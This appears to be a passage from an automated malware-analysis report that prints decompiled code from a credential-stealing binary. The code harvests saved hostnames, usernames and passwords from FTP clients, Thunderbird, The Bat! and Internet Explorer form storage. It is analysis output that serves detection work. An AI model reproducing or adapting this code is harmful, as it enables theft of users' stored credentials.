Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C90E, 0040C928, 0040C942, 0040C95E
LastAddress, xrefs: 0040C923
LastPort, xrefs: 0040C959
LastPassword, xrefs: 0040C909
BlazeFtp, xrefs: 0040C8A9
site.dat, xrefs: 0040C8CA, 0040C8F5
\BlazeFtp, xrefs: 0040C8FA
LastUser, xrefs: 0040C93D

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
Instruction ID: 3013046b71ecd8600bd216ab05a28f2b20a5d622d3359bada96b4353b2a25071
Opcode Fuzzy Hash: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
Instruction Fuzzy Hash: 55310B71940209FADF126BA2CC86FEE7E72AB84714F20813BB510751F1D7794A919B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406B7B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B7B(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char _v2092;
				long _t48;
				long _t49;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2092);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Hostname", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2088);
						if(_t64 == 0 || _v2088 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004017D5(_t65);
							}
							_v2084 = 0x15;
						} else {
							 *_t22 =  *_t64;
							E004017D5(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004041BC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2092);
							E00401486(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406B91
RegEnumKeyExA.ADVAPI32 ref: 00406BC5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D66

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Hostname, xrefs: 00406C20
Password, xrefs: 00406C02
Port, xrefs: 00406C61
Username, xrefs: 00406C3E

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 0b85c52166b349b0786779c279ec2d2bb21994fb8f438e0d5b86aa49b75ec8c5
Instruction ID: d58266f3bc7653ca31e84fadb1e2cf46137222864ef5a9eb4340578e60140e29
Opcode Fuzzy Hash: 0b85c52166b349b0786779c279ec2d2bb21994fb8f438e0d5b86aa49b75ec8c5
Instruction Fuzzy Hash: 7341F67194011CEAEF216F52CC42BDD7AB9BF08304F14C0BAB145750B1EE795EA19F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406947, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406947(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				long _t43;
				long _t44;
				intOrPtr* _t58;

				_t43 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t44 = _t43;
				if(_t44 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t49);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Server", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_t58 = E00401C8E( *0x4140fe, _v2068, "FtpPort",  &_v2088);
						if(_t58 == 0 || _v2088 != 4) {
							_t59 = _t58;
							if(_t58 != 0) {
								E004017D5(_t59);
							}
							_v2084 = 0x15;
						} else {
							 *_t21 =  *_t58;
							E004017D5(_t58);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t44;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040695D
RegEnumKeyExA.ADVAPI32 ref: 00406991
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B06

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Server, xrefs: 004069E7
Username, xrefs: 00406A05
FtpPort, xrefs: 00406A28
Password, xrefs: 004069C9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: edcc356f94931b8e853a56f5e8c7e23d482747ef630b5082daedc3d9e1b0c5e4
Instruction ID: acd88a8aff8ef73e47380c1a7cd8d89f608d6128b4cd4abc3c603a035cdc8412
Opcode Fuzzy Hash: edcc356f94931b8e853a56f5e8c7e23d482747ef630b5082daedc3d9e1b0c5e4
Instruction Fuzzy Hash: 8D413771A4011CFADF22AB62CC42BDD7AB9BF04304F14C0BAB145710B1EE795EA19F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E29C, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E29C(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				unsigned int _v32;
				long _t50;
				long _t51;

				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t51 = _t50;
				if(_t51 != 0) {
					return _t51;
				}
				_v12 = E00401C8E(_a4, _a8, "Site", 0);
				_v16 = E00401C8E(_a4, _a8, "UserID", 0);
				_v20 = E00401C8E(_a4, _a8, "xflags",  &_v32);
				_v24 = E00401C8E(_a4, _a8, "Port", 0);
				_v28 = E00401C8E(_a4, _a8, "Folder", 0);
				if(_v20 != 0 && _v32 != 0 && E00402A3B(_v20, _v32) != 0) {
					_v32 = _v32 >> 1;
					if(E004041BC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
						E00401486(_a12, 0xbeef0000);
						E004014E8(_a12, _v12);
						E004014E8(_a12, _v16);
						E004014BC(_a12, _v20, _v32);
						E004014E8(_a12, _v24);
						E004014E8(_a12, _v28);
					}
				}
				E004017D5(_v12);
				E004017D5(_v16);
				E004017D5(_v20);
				E004017D5(_v24);
				E004017D5(_v28);
				return RegCloseKey(_v8);
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E2AC
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E3DC

Part of subcall function 004041BC: LocalFree.KERNEL32(00000000), ref: 0040423C

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

Strings

Site, xrefs: 0040E2BB
Port, xrefs: 0040E2FC
xflags, xrefs: 0040E2E7
Folder, xrefs: 0040E311
UserID, xrefs: 0040E2D0

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFreeLocalOpenlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2116081971-269738940
Opcode ID: 2ba45bc0b1e5077dfb6307c853901a911e4cf85ae7aa6c8dc6b4e8a404e46ab7
Instruction ID: a4a650a3a6283ae73420e32a9eaac4a284f429e24d6150c9826fb7d835094a75
Opcode Fuzzy Hash: 2ba45bc0b1e5077dfb6307c853901a911e4cf85ae7aa6c8dc6b4e8a404e46ab7
Instruction Fuzzy Hash: 3631673195010ABBDF126F92CC46BEE7B72AF04344F10847ABA21751F1D77A8A61EB58

Uniqueness

Uniqueness Score: -1.00%

Function 004076F4, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004076F4(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t39;
				long _t40;

				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t40 = _t39;
				if(_t40 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t45);
						_v2072 = E00401C8E(_a8, _v2068, "InstallPath", 0);
						_v2076 = E00401C8E(_a8, _v2068, "DataDir", 0);
						if(_v2072 != 0) {
							E00404131(_a4, _v2072, "sites.dat", 0xbeef0000);
							E00404131(_a4, _v2072, "sites.ini", 0xbeef0001);
						}
						if(_v2076 != 0) {
							E00404131(_a4, _v2076, "sites.dat", 0xbeef0000);
							E00404131(_a4, _v2076, "sites.ini", 0xbeef0001);
						}
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004076F4(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t40;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407707
RegEnumKeyExA.ADVAPI32 ref: 0040773B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407856

Strings

sites.ini, xrefs: 004077CD, 00407806
sites.dat, xrefs: 004077B5, 004077EE
DataDir, xrefs: 0040778E
InstallPath, xrefs: 00407773

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: c5edbe9ac272d625ba1b6c92e1f5cea489021734854b6d20996da0d1bd180a7d
Instruction ID: 927ebaac81f16cff042132974810b193f85d558a295493d701847d58b646bf3e
Opcode Fuzzy Hash: c5edbe9ac272d625ba1b6c92e1f5cea489021734854b6d20996da0d1bd180a7d
Instruction Fuzzy Hash: 7B31367190010CFADF216F51CC42BDDBABABF40304F10C0BAB249750A1DBB96AD19F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F8D4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t27;
				void* _t28;
				void* _t29;

				_t29 = __eflags;
				_t28 = __edx;
				_t27 = __ecx;
				_v8 = E0040150D(_a4, 0x5f, 0);
				 *0x415824 = 2;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v269);
				 *0x415824 = 3;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t28, _t29, _a4, _v8);
			}

0x0040f8d4
0x0040f8d4
0x0040f8d4
0x0040f8e9
0x0040f8ec
0x0040f902
0x0040f91f
0x0040f93b
0x0040f947
0x0040f94c
0x0040f962
0x0040f97f
0x0040f99b
0x0040f9a7
0x0040f9b8

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F902

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F947
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F962
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F9A7

Strings

Software\Mozilla, xrefs: 0040F911, 0040F92E, 0040F971, 0040F98E
\Thunderbird, xrefs: 0040F907, 0040F924, 0040F967, 0040F984
Thunderbird, xrefs: 0040F90C, 0040F929, 0040F96C, 0040F989

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
Instruction ID: c0f4bf9869d67093f7a4d6c15c65fc638ecd3aa445a68d8f1d8abc8d79fc93f9
Opcode Fuzzy Hash: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
Instruction Fuzzy Hash: 991142B1690208BADB017B91CD03FC93E655B44748F518077B608741E3D6F989D08B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004078AB, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004078AB(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t22;
				void* _t26;
				void* _t28;
				char* _t31;
				int _t32;
				void* _t34;
				void* _t36;
				void* _t41;
				char* _t42;
				char* _t43;

				_v8 = E0040150D(_a4, 0x1b, 0);
				_t43 =  *0x414082; // 0x0
				_t42 =  *0x414086; // 0x0
				if( *_t42 == 0) {
					L11:
					E0040785F(_t49, _a4, 0x1a); // executed
					E0040785F(_t49, _a4, 0x23); // executed
					E0040785F(_t49, _a4, 0x1c); // executed
					E004076F4(_a4,  *0x4140fe, "SOFTWARE\\LeapWare"); // executed
					E004076F4(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
					return E00401553(_t41, _t49, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t22 = StrStrA(_t43, "unleap.exe");
					if(_t22 == 0) {
						__eflags = StrStrIA(_t42, "leapftp");
						if(__eflags != 0) {
							_t26 = E0040234A(__eflags, _t43);
							_push(_t26);
							E00404131(_a4, _t26, "sites.dat", 0xbeef0000);
							_t28 = _t26;
							E00404131(_a4, _t28, "sites.ini", 0xbeef0001);
							E004017D5();
						}
					} else {
						_t31 = _t22 + 1;
						if( *_t31 != 0) {
							_t32 = lstrlenA("unleap.exe");
							_t41 = _t31;
							_t34 = E0040234A(_t32 + _t41, _t32 + _t41);
							_push(_t34);
							E00404131(_a4, _t34, "sites.dat", 0xbeef0000);
							_t36 = _t34;
							E00404131(_a4, _t36, "sites.ini", 0xbeef0001);
							E004017D5();
						}
					}
					while( *_t43 != 0) {
						_t43 =  &(_t43[1]);
						__eflags = _t43;
					}
					_t43 =  &(_t43[1]);
					asm("cld");
					asm("repne scasb");
					_t49 =  *_t42;
				} while ( *_t42 != 0);
				goto L11;
			}

APIs

StrStrA.SHLWAPI(00000000,unleap.exe), ref: 004078DD
lstrlenA.KERNEL32(unleap.exe,00000001,00000000,unleap.exe), ref: 004078F2

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

StrStrIA.SHLWAPI(00000000,leapftp,00000000,unleap.exe), ref: 00407936

Strings

sites.ini, xrefs: 0040791B, 00407960
unleap.exe, xrefs: 004078D7, 004078ED
leapftp, xrefs: 00407930
sites.dat, xrefs: 00407907, 0040794C
SOFTWARE\LeapWare, xrefs: 004079AC, 004079BF

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
Instruction ID: 9698fba736c6e1230d64bcfce157fb16b9fb49397a8a83bf77b3dc4cab1f149d
Opcode Fuzzy Hash: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
Instruction Fuzzy Hash: 3821D5B1644504B9EB113B21CC06FEE3E1A9B90314F20803BBA05B95F3D7BC5EC1969E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFFB, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EFFB(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				intOrPtr _v20;
				char _v60;
				char _v64;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr _t47;
				intOrPtr _t53;
				void* _t62;

				_t36 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
				_t37 = _t36;
				if(_t37 != 0) {
					_v8 = _t37;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t38 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
				_t39 = _t38;
				if(_t39 != 0) {
					_v8 = _t39;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t40 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
				_t41 = _t40;
				if(_t41 != 0) {
					_v8 = _t41;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t43 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
				_t44 = _t43;
				if(_t44 != 0) {
					_v12 = _t44;
					if(_v16 != 4) {
						L17:
						return E004017D5(_v12);
					}
					_t47 =  *_v12;
					if(_t47 > 0x2710) {
						_t47 = 0x2710;
					}
					_v20 = _t47;
					while(_v20 != 0) {
						wsprintfA( &_v60, "Dir #%d", _v20);
						_t62 = _t62 + 0xc;
						_t53 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
						if(_t53 != 0) {
							_v8 = _t53;
							if(_v64 > 3) {
								E0040EF86(_a4, _v8);
							}
							E004017D5(_v8);
						}
						_v20 = _v20 - 1;
					}
					goto L17;
				}
				return _t44;
			}

APIs

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

wsprintfA.USER32 ref: 0040F0D0

Strings

ProgramDir, xrefs: 0040F031
Default, xrefs: 0040F05F
Software\RIT\The Bat!, xrefs: 0040F008, 0040F036
Dir #%d, xrefs: 0040F0C7
Working Directory, xrefs: 0040F003
Count, xrefs: 0040F08F
Software\RIT\The Bat!\Users depot, xrefs: 0040F064, 0040F094, 0040F0E0

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
Instruction ID: efec917b93c5790ddd6963f177ddc18cbde9d62d709c2f7ca4761b08757c98aa
Opcode Fuzzy Hash: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
Instruction Fuzzy Hash: 5F310771E40109FADF21AFA1DC42ADD7B72AB00304F244477B814B65E1E77A9BA4AB48

Uniqueness

Uniqueness Score: -1.00%

Function 00404A31, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A31(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				CHAR* _v12;
				intOrPtr _v16;
				int _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t79;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 2, 0);
				"_cx_ftp.ini" = 0x77;
				M004149B3 = 0x47;
				"_hisler\\Total Commander" = 0x47;
				_v12 = E004017EC(0x105);
				_t37 = GetWindowsDirectoryA(_v12, 0x104);
				if(_t37 == 0) {
					L3:
					E004017D5(_v12);
				} else {
					_t82 = _t37 - 0x104;
					if(_t37 > 0x104) {
						goto L3;
					} else {
						E004048FE(_a4, _v12); // executed
					}
				}
				_t39 = E00401DCE(_t82, 0x28); // executed
				E004048FE(_a4, _t39); // executed
				_t41 = E00401DCE(_t82, 0x1a); // executed
				_t42 = _t41;
				_t83 = _t42;
				if(_t42 != 0) {
					E004048FE(_a4, E00401D69(_t42, "\\GHISLER")); // executed
				}
				_t43 = E00401DCE(_t83, 0x23); // executed
				_t44 = _t43;
				_t84 = _t44;
				if(_t44 != 0) {
					E004048FE(_a4, E00401D69(_t44, "\\GHISLER")); // executed
				}
				_t45 = E00401DCE(_t84, 0x1c); // executed
				_t46 = _t45;
				if(_t45 != 0) {
					E004048FE(_a4, E00401D69(_t46, "\\GHISLER")); // executed
				}
				_t47 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t47);
				_t50 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "FtpIniName", 0);
				if(_t50 != 0) {
					_v16 = _t50;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t51 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t51);
				_t54 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "FtpIniName", 0);
				if(_t54 != 0) {
					_v16 = _t54;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t55 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t55);
				_t57 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "FtpIniName", 0); // executed
				_t58 = _t57;
				if(_t58 != 0) {
					_v16 = _t58;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t59 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t59);
				_t61 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "FtpIniName", 0); // executed
				_t62 = _t61;
				_t89 = _t62;
				if(_t62 != 0) {
					_v16 = _t62;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				return E00401553(_t79, _t89, _a4, _v8);
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404A70

Strings

Software\_hisler\Windows Commander, xrefs: 00404B09, 00404B29, 00404BAB, 00404BCA
\GHISLER, xrefs: 00404AB0, 00404ACF, 00404AEE
Software\_hisler\Total Commander, xrefs: 00404B5A, 00404B7A, 00404BFA, 00404C19
InstallDir, xrefs: 00404B04, 00404B55, 00404BA6, 00404BF5
FtpIniName, xrefs: 00404B24, 00404B75, 00404BC5, 00404C14

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\_hisler\Total Commander$Software\_hisler\Windows Commander$\GHISLER
API String ID: 3186838798-174342358
Opcode ID: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
Instruction ID: af35828189b00225af904a715eab3383fb197f901e28e357ccde0e703416f596
Opcode Fuzzy Hash: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
Instruction Fuzzy Hash: BD5156F5AA4249BAEF013BB2CD03FAD7E659F80748F10803B7614740F1DABD8950AA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A364, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t50;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t85;

				_t80 = __ecx;
				_t50 = lstrlenW(_a8);
				if(_t50 != 0) {
					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
					_t81 = 0;
					_v48 = 0;
					while(_t81 < 0x14) {
						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
						_t81 = _t81 + 1;
					}
					_t84 = 0;
					_v52 = 0;
					while(_t84 < 0x14) {
						_push( *(_t84 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t85 = _t85 + 0xc;
						_v52 = E00401D69(_v52,  &_v44);
						_t84 = _t84 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E00401D69(_v52,  &_v44);
					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t67 = _t66;
					if(_t67 != 0) {
						_v60 = _t67;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t30);
							_push(_v56);
							_pop( *_t32);
							_push(_v60);
							_pop( *_t34);
							_v72 = 0;
							if( *0x41442d != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x41442d() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E004017D5(_v60);
					}
					return E004017D5(_v52);
				} else {
					return _t50;
				}
			}

APIs

